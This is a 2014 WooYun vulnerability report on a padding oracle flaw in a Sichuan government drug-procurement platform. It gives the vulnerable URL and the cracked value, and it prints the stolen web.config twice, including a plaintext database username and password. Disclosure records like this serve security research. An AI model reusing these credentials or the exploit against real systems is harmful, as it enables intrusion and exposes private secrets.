当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054738

漏洞标题:四川省基本药物集中采购监管平台pandding oracle已读取web.config

相关厂商:cncert国家互联网应急中心

漏洞作者: eval

提交时间:2014-03-28 18:51

修复时间:2014-04-02 18:51

公开时间:2014-04-02 18:51

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

补丁没打导致存在该问题

详细说明:

存在链接:http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2
破解出来的密钥:
[+] Encrypted value is: -tdD30BG8jzmb-ZMaTslygAAAAAAAAAAAAAAAAAAAAA1
web.config文件:

<?xml version="1.0"?>
<configuration>
<configSections>
<sectionGroup name="applicationSettings" type="System.Configuration.Applicat
ionSettingsGroup, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5
c561934e089">
<section name="HZ.Supervise.Web.Properties.Settings" type="System.Configur
ation.ClientSettingsSection, System, Version=2.0.0.0, Culture=neutral, PublicKey
Token=b77a5c561934e089" requirePermission="false"/>
</sectionGroup>
<sectionGroup name="system.web.extensions" type="System.Web.Configuration.Sy
stemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=31BF3856AD364E35">
<sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSec
tionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyTok
en=31BF3856AD364E35">
<sectionGroup name="webServices" type="System.Web.Configuration.Scriptin
gWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35">
</sectionGroup>
</sectionGroup>
</sectionGroup>
</configSections>
<appSettings>
<add key="HospitalID" value="~/Hospital/HospitaltotalStatistics.aspx"/>
<add key="CompanyID_PS" value="~/Company/TradingStatisticsCompanyPS.aspx"/>
<add key="OrderID" value="~/TotalDrugs/OrderStatistics.aspx"/>
<add key="AreaID" value="~/Hospital/AreaStatistics.aspx"/>
<add key="ProcureCatalogID" value="~/TotalDrugs/TotalDrugsStatistics.aspx"/>
<add key="SortID" value="~/TotalDrugs/SortStatistics.aspx"/>
<add key="QualityLevel" value="~/Common/QueryDrugsByQualityLevel.aspx"/>
<add key="SortSource" value="~/TotalDrugs/SortSourceStatistics.aspx"/>
<add key="CompanyName_SC" value="~/Company/CompanyInfo_SC.aspx"/>
<add key="CompanyName_TB" value="~/Company/CompanyInfo_TB.aspx"/>
<add key="HosComDrugs" value="~/TotalDrugs/HospitalCompanyDRugsTotal.aspx"/>
<add key="DetailInfo" value="~/TotalDrugs/TransactionDetail.aspx"/>
<add key="InsuranceType" value="~/Common/QueryDrugsByInsuranceType.aspx"/>
<add key="NoSendDetail" value="~/Company/NoSendDetail.aspx"/>
<add key="NoSendOnTime" value="~/Company/NoSendOnTimeCompanyPS.aspx"/>
<add key="ExpensiveDrugs" value="~/TotalDrugs/ExpensivedrugsStatistics.aspx"
/>
<add key="ExpensiveDrugsSet" value="~/Hospital/HospitalHighPricedDrugs.aspx"
/>
<add key="MonthHospital" value="~/Hospital/MonthStatistics.aspx"/>
<add key="UnTradeProduct" value="~/TotalDrugs/UnTradeProcureCatalog.aspx"/>
<add key="WarningSetup" value="~/EarlyWarning/WarningSetup.aspx"/>
<add key="WarningMap" value="~/EarlyWarning/WarningMap.aspx"/>
<add key="WarningDeal" value="~/EarlyWarning/DrugPreWarning_CL.aspx"/>
<add key="Whitelist" value="~/Admin/BlacklistUserList.aspx"/>
<add key="InvoiceSerialID" value="~/Hospital/InvoiceList.aspx"/>
<add key="CommandTimeout" value="300"/>
<!--瓒呮椂鏃堕棿璁剧疆-->
<!-- 绯荤粺閮ㄧ讲鍖哄煙 渚嬪 姹熻嫃 320000-->
<add key="CURRENT_DEPLOY_AREAID" value="510000"/>
<add key="HZ.Supervise.WebService.MainService" value="http://localhost/MainS
ervice.asmx"/>
</appSettings>
<connectionStrings>
<clear/>
<add name="connectstrings" connectionString="Data Source=10.10.10.4;Initial
Catalog=scjy;user id=scjyzb;password=yzbzb6110wst;"/>
</connectionStrings>
<system.web>
<!--
璁剧疆 compilation debug="true" 鍙皢璋冭瘯绗﹀彿鎻掑叆
宸茬紪璇戠殑椤甸潰涓€備絾鐢变簬杩欎細
褰卞搷鎬ц兘锛屽洜姝ゅ彧鍦ㄥ紑鍙戣繃绋嬩腑灏嗘鍊?
璁剧疆涓?true銆?
-->
<compilation debug="true">
<assemblies>
<add assembly="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, P
ublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyT
oken=B77A5C561934E089"/>
<add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral,
PublicKeyToken=31BF3856AD364E35"/>
<add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, Public
KeyToken=B77A5C561934E089"/>
<add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=B77A5C561934E089"/>
</assemblies>
</compilation>
<!--
閫氳繃 <authentication> 鑺傚彲浠ラ厤缃?ASP.NET 鐢ㄦ潵
璇嗗埆杩涘叆鐢ㄦ埛鐨?
瀹夊叏韬唤楠岃瘉妯″紡銆?
-->
<authentication mode="Windows"/>
<!--
濡傛灉鍦ㄦ墽琛岃姹傜殑杩囩▼涓嚭鐜版湭澶勭悊鐨勯敊璇紝
鍒欓€氳繃 <customErrors> 鑺傚彲浠ラ厤缃浉搴旂殑澶勭悊姝ラ銆傚叿
浣撹鏉ワ紝
寮€鍙戜汉鍛橀€氳繃璇ヨ妭鍙互閰嶇疆
瑕佹樉绀虹殑 html 閿欒椤?
浠ヤ唬鏇块敊璇爢鏍堣窡韪€?
<customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
<error statusCode="403" redirect="NoAccess.htm" />
<error statusCode="404" redirect="FileNotFound.htm" />
</customErrors>
-->
<customErrors mode="Off" defaultRedirect="Common/DefaultError.aspx">
<error statusCode="403" redirect="Common/NoPermission.aspx"/>
<error statusCode="404" redirect="Common/FileNotFound.aspx"/>
</customErrors>
<pages theme="涓婚1">
<controls>
<add tagPrefix="hzw" namespace="HZ.Web" assembly="CommonLib"/>
<add tagPrefix="webdiyer" namespace="Wuqi.Webdiyer" assembly="AspNetPage
r"/>
<add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Exte
nsions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="Sys
tem.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD3
64E35"/>
</controls>
</pages>
<httpHandlers>
<remove verb="*" path="*.asmx"/>
<add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Servi
ces.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35"/>
<add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Sc
ript.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Cult
ure=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add verb="GET,HEAD" path="ScriptResource.axd" validate="false" type="Syst
em.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, C
ulture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</httpHandlers>
<httpModules>
<add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.We
b.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"
/>
</httpModules>
</system.web>
<!--
鍦?Internet 淇℃伅鏈嶅姟 7.0 涓嬭繍琛?ASP.NET AJAX 闇€瑕?system.webServe
r
鑺傘€傚鏃╂湡鐗堟湰鐨?IIS 鏉ヨ鍒欎笉闇€瑕佹鑺傘€?
-->
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules>
<remove name="ScriptModule"/>
<add name="ScriptModule" preCondition="managedHandler" type="System.Web.Ha
ndlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, Pu
blicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers>
<remove name="WebServiceHandlerFactory-Integrated"/>
<remove name="ScriptHandlerFactory"/>
<remove name="ScriptHandlerFactoryAppServices"/>
<remove name="ScriptResource"/>
<add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="inte
gratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Ex
tensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.ax
d" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerF
actory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=
31BF3856AD364E35"/>
<add name="ScriptResource" verb="GET,HEAD" path="ScriptResource.axd" preCo
ndition="integratedMode" type="System.Web.Handlers.ScriptResourceHandler, System
.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E
35"/>
</handlers>
</system.webServer>
<startup>
<supportedRuntime version="v2.0.50727"/>
</startup>
<applicationSettings>
<HZ.Supervise.Web.Properties.Settings>
<setting name="HZ_Supervise_Web_WebService_Service" serializeAs="String">
<value>http://emed.3322.org/WebService/MainService.asmx</value>
</setting>
</HZ.Supervise.Web.Properties.Settings>
</applicationSettings>
<system.codedom>
<compilers>
<compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CSharp
.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b7
7a5c561934e089" warningLevel="4">
<providerOption name="CompilerVersion" value="v3.5"/>
<providerOption name="WarnAsError" value="false"/>
</compiler>
</compilers>
</system.codedom>
<runtime>
<assemblyBinding appliesTo="v2.0.50727" xmlns="urn:schemas-microsoft-com:asm
.v1">
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856a
d364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31
bf3856ad364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>

漏洞证明:

存在链接:http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2
破解出来的密钥:
[+] Encrypted value is: -tdD30BG8jzmb-ZMaTslygAAAAAAAAAAAAAAAAAAAAA1
web.config文件:

<?xml version="1.0"?>
<configuration>
<configSections>
<sectionGroup name="applicationSettings" type="System.Configuration.Applicat
ionSettingsGroup, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5
c561934e089">
<section name="HZ.Supervise.Web.Properties.Settings" type="System.Configur
ation.ClientSettingsSection, System, Version=2.0.0.0, Culture=neutral, PublicKey
Token=b77a5c561934e089" requirePermission="false"/>
</sectionGroup>
<sectionGroup name="system.web.extensions" type="System.Web.Configuration.Sy
stemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=31BF3856AD364E35">
<sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSec
tionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyTok
en=31BF3856AD364E35">
<sectionGroup name="webServices" type="System.Web.Configuration.Scriptin
gWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35">
</sectionGroup>
</sectionGroup>
</sectionGroup>
</configSections>
<appSettings>
<add key="HospitalID" value="~/Hospital/HospitaltotalStatistics.aspx"/>
<add key="CompanyID_PS" value="~/Company/TradingStatisticsCompanyPS.aspx"/>
<add key="OrderID" value="~/TotalDrugs/OrderStatistics.aspx"/>
<add key="AreaID" value="~/Hospital/AreaStatistics.aspx"/>
<add key="ProcureCatalogID" value="~/TotalDrugs/TotalDrugsStatistics.aspx"/>
<add key="SortID" value="~/TotalDrugs/SortStatistics.aspx"/>
<add key="QualityLevel" value="~/Common/QueryDrugsByQualityLevel.aspx"/>
<add key="SortSource" value="~/TotalDrugs/SortSourceStatistics.aspx"/>
<add key="CompanyName_SC" value="~/Company/CompanyInfo_SC.aspx"/>
<add key="CompanyName_TB" value="~/Company/CompanyInfo_TB.aspx"/>
<add key="HosComDrugs" value="~/TotalDrugs/HospitalCompanyDRugsTotal.aspx"/>
<add key="DetailInfo" value="~/TotalDrugs/TransactionDetail.aspx"/>
<add key="InsuranceType" value="~/Common/QueryDrugsByInsuranceType.aspx"/>
<add key="NoSendDetail" value="~/Company/NoSendDetail.aspx"/>
<add key="NoSendOnTime" value="~/Company/NoSendOnTimeCompanyPS.aspx"/>
<add key="ExpensiveDrugs" value="~/TotalDrugs/ExpensivedrugsStatistics.aspx"
/>
<add key="ExpensiveDrugsSet" value="~/Hospital/HospitalHighPricedDrugs.aspx"
/>
<add key="MonthHospital" value="~/Hospital/MonthStatistics.aspx"/>
<add key="UnTradeProduct" value="~/TotalDrugs/UnTradeProcureCatalog.aspx"/>
<add key="WarningSetup" value="~/EarlyWarning/WarningSetup.aspx"/>
<add key="WarningMap" value="~/EarlyWarning/WarningMap.aspx"/>
<add key="WarningDeal" value="~/EarlyWarning/DrugPreWarning_CL.aspx"/>
<add key="Whitelist" value="~/Admin/BlacklistUserList.aspx"/>
<add key="InvoiceSerialID" value="~/Hospital/InvoiceList.aspx"/>
<add key="CommandTimeout" value="300"/>
<!--瓒呮椂鏃堕棿璁剧疆-->
<!-- 绯荤粺閮ㄧ讲鍖哄煙 渚嬪 姹熻嫃 320000-->
<add key="CURRENT_DEPLOY_AREAID" value="510000"/>
<add key="HZ.Supervise.WebService.MainService" value="http://localhost/MainS
ervice.asmx"/>
</appSettings>
<connectionStrings>
<clear/>
<add name="connectstrings" connectionString="Data Source=10.10.10.4;Initial
Catalog=scjy;user id=scjyzb;password=yzbzb6110wst;"/>
</connectionStrings>
<system.web>
<!--
璁剧疆 compilation debug="true" 鍙皢璋冭瘯绗﹀彿鎻掑叆
宸茬紪璇戠殑椤甸潰涓€備絾鐢变簬杩欎細
褰卞搷鎬ц兘锛屽洜姝ゅ彧鍦ㄥ紑鍙戣繃绋嬩腑灏嗘鍊?
璁剧疆涓?true銆?
-->
<compilation debug="true">
<assemblies>
<add assembly="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, P
ublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyT
oken=B77A5C561934E089"/>
<add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral,
PublicKeyToken=31BF3856AD364E35"/>
<add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, Public
KeyToken=B77A5C561934E089"/>
<add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=B77A5C561934E089"/>
</assemblies>
</compilation>
<!--
閫氳繃 <authentication> 鑺傚彲浠ラ厤缃?ASP.NET 鐢ㄦ潵
璇嗗埆杩涘叆鐢ㄦ埛鐨?
瀹夊叏韬唤楠岃瘉妯″紡銆?
-->
<authentication mode="Windows"/>
<!--
濡傛灉鍦ㄦ墽琛岃姹傜殑杩囩▼涓嚭鐜版湭澶勭悊鐨勯敊璇紝
鍒欓€氳繃 <customErrors> 鑺傚彲浠ラ厤缃浉搴旂殑澶勭悊姝ラ銆傚叿
浣撹鏉ワ紝
寮€鍙戜汉鍛橀€氳繃璇ヨ妭鍙互閰嶇疆
瑕佹樉绀虹殑 html 閿欒椤?
浠ヤ唬鏇块敊璇爢鏍堣窡韪€?
<customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
<error statusCode="403" redirect="NoAccess.htm" />
<error statusCode="404" redirect="FileNotFound.htm" />
</customErrors>
-->
<customErrors mode="Off" defaultRedirect="Common/DefaultError.aspx">
<error statusCode="403" redirect="Common/NoPermission.aspx"/>
<error statusCode="404" redirect="Common/FileNotFound.aspx"/>
</customErrors>
<pages theme="涓婚1">
<controls>
<add tagPrefix="hzw" namespace="HZ.Web" assembly="CommonLib"/>
<add tagPrefix="webdiyer" namespace="Wuqi.Webdiyer" assembly="AspNetPage
r"/>
<add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Exte
nsions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="Sys
tem.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD3
64E35"/>
</controls>
</pages>
<httpHandlers>
<remove verb="*" path="*.asmx"/>
<add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Servi
ces.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35"/>
<add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Sc
ript.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Cult
ure=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add verb="GET,HEAD" path="ScriptResource.axd" validate="false" type="Syst
em.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, C
ulture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</httpHandlers>
<httpModules>
<add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.We
b.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"
/>
</httpModules>
</system.web>
<!--
鍦?Internet 淇℃伅鏈嶅姟 7.0 涓嬭繍琛?ASP.NET AJAX 闇€瑕?system.webServe
r
鑺傘€傚鏃╂湡鐗堟湰鐨?IIS 鏉ヨ鍒欎笉闇€瑕佹鑺傘€?
-->
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules>
<remove name="ScriptModule"/>
<add name="ScriptModule" preCondition="managedHandler" type="System.Web.Ha
ndlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, Pu
blicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers>
<remove name="WebServiceHandlerFactory-Integrated"/>
<remove name="ScriptHandlerFactory"/>
<remove name="ScriptHandlerFactoryAppServices"/>
<remove name="ScriptResource"/>
<add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="inte
gratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Ex
tensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.ax
d" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerF
actory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=
31BF3856AD364E35"/>
<add name="ScriptResource" verb="GET,HEAD" path="ScriptResource.axd" preCo
ndition="integratedMode" type="System.Web.Handlers.ScriptResourceHandler, System
.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E
35"/>
</handlers>
</system.webServer>
<startup>
<supportedRuntime version="v2.0.50727"/>
</startup>
<applicationSettings>
<HZ.Supervise.Web.Properties.Settings>
<setting name="HZ_Supervise_Web_WebService_Service" serializeAs="String">
<value>http://emed.3322.org/WebService/MainService.asmx</value>
</setting>
</HZ.Supervise.Web.Properties.Settings>
</applicationSettings>
<system.codedom>
<compilers>
<compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CSharp
.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b7
7a5c561934e089" warningLevel="4">
<providerOption name="CompilerVersion" value="v3.5"/>
<providerOption name="WarnAsError" value="false"/>
</compiler>
</compilers>
</system.codedom>
<runtime>
<assemblyBinding appliesTo="v2.0.50727" xmlns="urn:schemas-microsoft-com:asm
.v1">
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856a
d364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31
bf3856ad364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>

修复方案:

请及时更新补丁

版权声明:转载请注明来源 eval@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-02 18:51

厂商回复:

最新状态:

暂无


漏洞评价:

评论